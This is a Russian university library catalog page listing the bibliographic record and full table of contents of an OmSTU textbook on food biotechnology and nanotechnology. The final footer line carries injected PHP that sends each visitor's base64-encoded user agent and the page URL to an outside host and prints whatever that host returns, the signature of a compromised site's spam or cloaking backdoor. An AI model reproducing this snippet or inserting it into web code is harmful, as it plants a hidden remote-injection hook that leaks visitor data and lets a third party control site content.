Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

72 пользователей



 
      Наши партнеры
Студенческий информационный портал компании
("Шифр документа=029B3EEF-2929-0BC6-CC87-AB695C83675C$")И(("Ключевые слова=Пищеварение"))
Результаты поиска
СВОДНЫЙ КАТАЛОГ: Найдено записей: 1
1. 
029B3EEF-2929-0BC6-CC87-AB695C83675C
029B3EEF-2929-0BC6-CC87-AB695C83675C
57/А86
Артюхова, Светлана Ивановна.
Основы пищевой биотехнологии и нанотехнологии [Текст] : учеб. пособие / С. И. Артюхова, Ю. А. Гаврилова ; ОмГТУ. - Омск : Изд-во ОмГТУ, 2010. - 310 с. : рис., табл. - Библиогр.: с. 279-299. - Предм. указ.: с. 300-310. - 150 экз. - ISBN 978-5-8149-0924-4
Содержание:
Введение. - С. 6
Глава 1. Питание человека. Общие положения. - С. 8
1.1. Роль пищи для организма человека. - С. 8
1.2. Теория питания. - С. 9
1.3. Физиология пищеварения. - С. 28
1.4. Пищевой рацион современного человека. - С. 39
1.5. Основные нарушения питания и их влияние на здоровье. - С. 40
Контрольные вопросы. - С. 42
2. Характеристика важнейших компонентов пищи. - С. 43
2.1. Белки. - С. 43
2.1.1. Характеристика белков. - С. 45
2.1.2. Функциональные свойства белка. - С. 46
2.1.3. Превращение белков при производстве пищевых продуктов. - С. 51
2.2. Липиды. - С. 54
2.2.1. Характеристики липидов. - С. 54
2.2.2. Функциональные свойства липидов. - С. 57
2.2.3. Превращение липидов при производстве пищевых продуктов. - С. 60
2.3. Углеводы. - С. 64
2.3.1. Характеристика углеводов. - С. 64
2.3.2. Физиологическое значение углеводов. - С. 68
2.3.3. Превращение углеводов при производстве пищевых продуктов. - С. 70
2.4. Минеральные вещества. - С. 73
2.4.1. Характеристика минеральных веществ. - С. 73
2.4.2. Физиологическое значение минеральных веществ для организма человека. - С. 75
2.5.2. Влияние технологической обработки на витаминный состав пищевых продуктов. - С. 94
2.6. Ферменты. - С. 97
2.6.1. Характеристика ферментов. - С. 97
2.6.2. Применение ферментных препаратов в пищевых биотехнологиях. - С. 104
2.7. Вода. - С. 106
2.7.1. Характеристика воды. - С. 106
2.7.2. Свободная и связанная влага в пищевых продуктах. - С. 109
2.7.3. Активность воды. - С. 111
Контрольные вопросы. - С. 113
Глава 3. Пищевые добавки. - С. 114
3.1. Характеристика и классификация пищевых добавок. - С. 114
3.2. Гигиеническая регламентация пищевых добавок в продуктах питания. - С. 117
3.3. Характеристика некоторых пищевых добавок. - С. 120
3.3.1. Ароматизаторы. - С. 120
3.3.2. Красители. - С. 123
3.3.3. Подсластители. - С. 132
3.3.4. Пряности. - С. 136
3.3.5. Специи. - С. 144
3.3.6. Пищевые кислоты. - С. 158
Контрольные вопросы. - С. 163
Глава 4. Биологически активные добавки. - С. 164
4.1. Биологически активные добавки. - С. 164
4.2. Эубиотики - биологически активные вещества для здоровья. - С. 169
4.2.1. Пробиотики. - С. 170
4.2.2. Пребиотики. - С. 186
4.2.3. Синбиотики. - С. 201
Контрольные вопросы. - С. 204
Глава 5. Научные основы биотехнологии современных продуктов питания. - С. 205
5.1. Теоретические принципы конструирования и проектирования продуктов питания. - С. 205
5.2. Проектирование состава и свойств функциональных продуктов питания. - С. 208
5.3. Получение пищевых продуктов, ингредиентов, материалов на основе биокаталических процессов обработки коллагенсодержащих животных тканей. - С. 215
5.4. Современные физические методы обработки молочного сырья и пути их использования в производстве функциональных продуктов питания. - С. 217
5.5. Инновационные методы в производстве функциональных продуктов на основе последних достижений науки и техники. - С. 223
5.5.1. Основные направления пищевых нанотехнологий . - С. 227
5.5.2. Нанонутриенты. - С. 229
5.5.3. Наноструктурированные пищевые продукты. - С. 230
5.5.4. Наноинкапсулированные пищевые вещества. - С. 231
5.5.5. Нанотранспортные системы, биологически активные добавки к пище и пищевые добавки. - С. 234
5.5.6. Особенности применения нанотехнологий в молочной промышленности. - С. 235
5.5.7. Нанотехнологии в пастеризации молока. Низкотемпературные пастеризаторы с инфракрасным нагревом. - С. 240
5.5.8. Применение нанотехнологий в других отраслях пищевой промышленности. - С. 243
5.5.9. Применение нанотехнологии при производстве упаковочных материалов для пищевых продуктов и материалов, контактирующих с ними. - С. 246
5.5.10. Проблемы контроля и оценки безопасности искусственных наноматериалов в составе пищевых продуктов. - С. 252
Контрольные вопросы. - С. 263
6. Искусственная и генномодифицированная пища. - С. 264
6.1. Искусственная пища. - С. 364
6.2. Генетически модифицированные продукты. - С. 266
Контрольные вопросы. - С. 277
Заключение. - С. 278
Библиографический список. - С. 279
Предметный указатель. - С. 300
УДК 579.67(075) + 664(075) + 60(075) + 620.3(075)

Рубрики:
Микробиология пищевая -- УЧЕБНИКИ И ПОСОБИЯ
Биотехнологии -- УЧЕБНИКИ И ПОСОБИЯ
Нанотехнологии -- Учебники и пособия
28 (Химические технологии переработки углеводородов)
Химические технологии переработки углеводородов
Учебники и пособия -- Очное обучение

Кл.слова (ненормированные): ОМПИ -- ОМГТУ -- УЧЕБНИК И ПОСОБИЕ -- ПИТАНИЕ -- ЧЕЛОВЕК -- ФИЗИОЛОГИЯ -- ПИЩЕВАРЕНИЕ -- РАЦИОН -- НАРУШЕНИЕ -- БЕЛОК -- ЛИПИДАХ -- УГЛЕВОД -- МИНЕРАЛЬНОЕ -- ВЕЩЕСТВО -- ВИТАМИН -- ФЕРМЕНТ -- ВОДА -- БАД -- ДОБАВКА -- АРОМАТИЗАТОРЫ -- КРАСИТЕЛЬ -- ПОДСЛАСТИТЕЛЬ -- ПРЯНОСТЬ -- СПЕЦИФИЧНОСТЬ -- ЭУБИОТИК -- ПРОБИОТИК -- ПРЕБИОТИК -- СИНБИОТИК -- НАНОНУТРИЕНТ -- ПИЩА -- ИСКУССТВЕННАЯ -- ГЕННОМОДИФИЦИРОВАННАЯ
Аннотация: В учебном пособии изложены основы пищевой биотехнологии и нанотехнологии.
Доп. точки доступа:
Гаврилова, Юлия Александровна
Омский государственный технический университет (Омск)

Нет сведений об экземплярах
Держатели документа:
Научная библиотека Омского государственного технического университета : Россия, 644050, г. Омск, проспект Мира, 11
Оглавление 
Держатели документа (Информация об экземплярах) 

В учебном пособии изложены основы пищевой биотехнологии и нанотехнологии.

Полный текст


    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 3182 - 25.02.2020
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 1.75 с.14 запросов, 1.46c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;